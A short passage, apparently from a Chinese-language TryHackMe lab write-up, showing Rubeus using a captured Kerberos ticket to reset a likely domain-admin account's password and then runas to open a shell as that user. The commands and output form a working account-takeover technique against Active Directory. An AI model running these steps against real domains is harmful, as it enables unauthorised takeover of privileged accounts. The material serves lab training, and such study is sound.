C:\THMTools> .\Rubeus.exe changepw /ticket:svc.gitlab.kirbi /new:Tryhackme! /dc:LUNDC.lunar.eruca.com /targetuser:lunar.eruca.com\da-nread
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Reset User Password (AoratoPw)
[*] Using domain controller: LUNDC.lunar.eruca.com (10.10.69.219)
[*] Resetting password for target user: lunar.eruca.com\da-nread
[*] New password value: Tryhackme!
[*] Building AP-REQ for the MS Kpassword request
[*] Building Authenticator with encryption key type: aes256_cts_hmac_sha1
[*] base64(session subkey): UP+L2OgmJ281TkkXYNKR0ahLJni1fIk/XMBFwwNTP7Q=
[*] Building the KRV-PRIV structure
[+] Password change success!
然后我们可以打开一个 cmd.exe 打开一个命令窗口:
C:\THMTools>runas /user:lunar.eruca.com\da-nread cmd.exe
Enter the password for lunar.eruca.com\da-nread: Tryhackme!
Attempting to start cmd.exe as user "lunar.eruca.com\da-nread" ...
工具
我们可以使用下面这个工具协助操作:
GitHub - GhostPack/PSPKIAudit: PowerShell toolkit for AD CS auditing based on the PSPKI toolkit.
